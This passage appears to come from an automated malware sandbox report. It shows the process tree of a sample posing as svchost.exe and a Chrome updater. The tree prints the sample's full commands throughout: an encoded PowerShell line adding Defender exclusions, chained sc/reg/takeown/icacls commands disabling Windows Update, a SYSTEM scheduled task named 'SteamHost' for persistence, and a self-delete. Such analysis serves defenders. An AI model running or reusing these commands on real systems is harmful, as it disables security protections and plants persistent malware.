        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:4992
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:100
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2536
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3232
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2220
      - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        6⤵
        Drops file in Windows directory
        
        PID:3088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        
        PID:3200
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3620
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        
        PID:4432
        
        C:\Users\Admin\Chrome\updater.exe
        
        C:\Users\Admin\Chrome\updater.exe
        7⤵
        Executes dropped EXE
        
        PID:4468
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
        8⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        
        PID:2684
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        9⤵
        
        PID:32
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3232
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        9⤵
        
        PID:5796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1020
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        10⤵
        Launches sc.exe
        
        PID:1280
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        10⤵
        Launches sc.exe
        
        PID:5832
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        10⤵
        Launches sc.exe
        
        PID:5236
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        10⤵
        Launches sc.exe
        
        PID:5724
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        10⤵
        Launches sc.exe
        
        PID:3612
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:6036
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:6080
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        10⤵
        Launches sc.exe
        
        PID:5988
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:5952
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:6104
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:5864
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        10⤵
        Launches sc.exe
        
        PID:4532
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:3172
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        10⤵
        Launches sc.exe
        
        PID:5744
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        10⤵
        Launches sc.exe
        
        PID:5728
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5260
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        10⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4088
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        10⤵
        
        PID:2228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        10⤵
        
        PID:6096
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        10⤵
        
        PID:912
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        10⤵
        
        PID:6128
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        10⤵
        
        PID:1580
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        10⤵
        
        PID:3064
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        10⤵
        
        PID:4524
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        10⤵
        
        PID:4444
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        10⤵
        
        PID:4080
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        10⤵
        
        PID:5408
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        10⤵
        
        PID:3124
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        10⤵
        
        PID:2548
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        10⤵
        
        PID:5360
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        9⤵
        Power Settings
        
        PID:2256
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4872
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        10⤵
        Power Settings
        
        PID:964
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        10⤵
        Power Settings
        
        PID:5692
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        10⤵
        Power Settings
        
        PID:5720
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        10⤵
        Power Settings
        
        PID:5500
        
        C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        9⤵
        
        PID:5336
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "sjrcqeodaodte"
        10⤵
        
        PID:5204
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        
        PID:2240
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5888
        
        C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:4608
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3172
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      C:\Users\Admin\AppData\Local\Temp\svchost.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2252
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4548
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        
        PID:2492
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2116
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:3724
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        7⤵
        Launches sc.exe
        
        PID:3620
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        7⤵
        Launches sc.exe
        
        PID:2880
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:3176
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:3352
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:1476
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2548
        
        C:\Windows\system32\sc.exe
        
        sc config bits start= disabled
        7⤵
        Launches sc.exe
        
        PID:4456
        
        C:\Windows\system32\sc.exe
        
        sc failure bits reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:372
        
        C:\Windows\system32\sc.exe
        
        sc config dosvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:3520
        
        C:\Windows\system32\sc.exe
        
        sc failure dosvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:4248
        
        C:\Windows\system32\sc.exe
        
        sc config UsoSvc start= disabled
        7⤵
        Launches sc.exe
        
        PID:3580
        
        C:\Windows\system32\sc.exe
        
        sc failure UsoSvc reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:2772
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        7⤵
        Launches sc.exe
        
        PID:4540
        
        C:\Windows\system32\sc.exe
        
        sc failure wuauserv reset= 0 actions= ""
        7⤵
        Launches sc.exe
        
        PID:1976
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1128
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        7⤵
        
        PID:2692
        
        C:\Windows\system32\reg.exe
        
        reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        7⤵
        
        PID:5312
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        7⤵
        
        PID:5408
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        7⤵
        
        PID:5480
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        7⤵
        
        PID:5524
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        7⤵
        
        PID:5612
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        7⤵
        
        PID:5708
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        7⤵
        
        PID:5804
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        7⤵
        
        PID:5900
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        7⤵
        
        PID:6024
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        7⤵
        
        PID:6092
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        7⤵
        
        PID:3348
        
        C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        7⤵
        
        PID:796
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:3172
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3740
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2528
        
        C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3024
      - C:\Windows\System32\conhost.exe
        
        C:\Windows\System32\conhost.exe
        6⤵
        Drops file in Windows directory
        
        PID:2220
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        
        PID:3756
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2456
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
        6⤵
        
        PID:5544
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5284
        
        C:\Users\Admin\Chrome\updater.exe
        
        C:\Users\Admin\Chrome\updater.exe
        7⤵
        Executes dropped EXE
        
        PID:5688
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
        8⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:6044
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        9⤵
        
        PID:4044
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:4824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="
        10⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1812
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        9⤵
        
        PID:5076
        
        C:\Windows\System32\Conhost.exe
        
